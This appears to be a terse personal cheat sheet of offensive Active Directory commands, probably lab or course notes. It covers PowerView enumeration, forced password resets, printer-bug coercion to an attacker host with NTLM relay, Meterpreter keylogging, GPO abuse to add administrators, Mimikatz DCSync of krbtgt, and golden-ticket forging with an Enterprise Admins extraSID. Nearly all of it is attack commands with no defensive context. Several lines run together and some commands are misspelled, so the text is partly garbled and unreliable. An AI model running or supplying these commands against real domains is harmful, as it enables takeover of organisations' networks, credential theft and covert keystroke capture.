Powersploit
BloodHound, check permissions to target
Add-GroupMember "<GroupName>" -Members "<username>"
Get-ADGroupMember -Identity "<GroupName>"
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
SpoolSample.exe <domain> "$ATTACKER_IP"
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
migrate <processID>
keyscan_start
keyscan_dump
GPO has a GUIDGPOs are stored on the SYSVOL to be distributed to any machine in the domaincmd with a AD user and execute mmc through itrunas /netonly /user:<domain>\<username> cmd.exe
mmc
cmd.exe via dir \\<domain>\sysvol
File -> Add/Remove Snap-in -> Group Policy Management -> OKGroup Policy Management -> Forest bla -> Domains -> <domain> -> Server -> Management Servers and right click to edit the groupComputer Configuration -> Policies -> Windows Settings -> Security Settings -> right click Restricted Groups -> Add Group -> name like IT Support -> edit the group and Add Administrators and Remote Desktop Users groupsDomain Trusts offer access to resources to users in the domain
Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
krbtgt as an account signs and encrypts TGTsKRBTGT via Mimikatz, resulting in Hash NTLMprivilege::debug
lsadump::dsync /user:<username\kbtgt>
Craft the ticket with the help of this hash
Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is S-1-5-21-<RootDomain>-519
Get-ADComputer -Identity "<DCChildCN>"
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
KERB_VALIDATION_INFO via Mimikatzprivilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$
Social_engineering